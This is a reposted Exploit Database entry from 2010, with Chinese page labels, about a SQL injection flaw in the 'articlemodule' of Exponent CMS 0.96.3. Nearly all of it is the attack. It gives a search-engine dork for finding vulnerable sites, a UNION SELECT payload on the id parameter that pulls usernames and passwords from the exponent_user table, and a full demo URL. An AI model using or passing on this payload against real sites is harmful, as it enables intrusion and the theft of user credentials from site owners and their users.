Exponent CMS 0.96.3 – ‘articlemodule’ SQL Injection

• Exploit Database
• 30 阅读

• 作者： T u R c O
  日期： 2010-02-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11349/

• Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability 
  ======================================================== 
  
  #################################################################### 
  # Author : T u R c O
  # Home : www.1923Turk.com
  # Script : exponentcms
  # Dork: "Welcome to Exponent CMS" | "my new exponent site"inurl:articlemodule
  
  
  #################################################################### 
  
  ===[ Exploit ]=== 
  
  http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
  
  -1+union+select+1,2,3,password,username,6+from+exponent_user--
  
  Demo:
  
  http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
  
   
  ####################################################################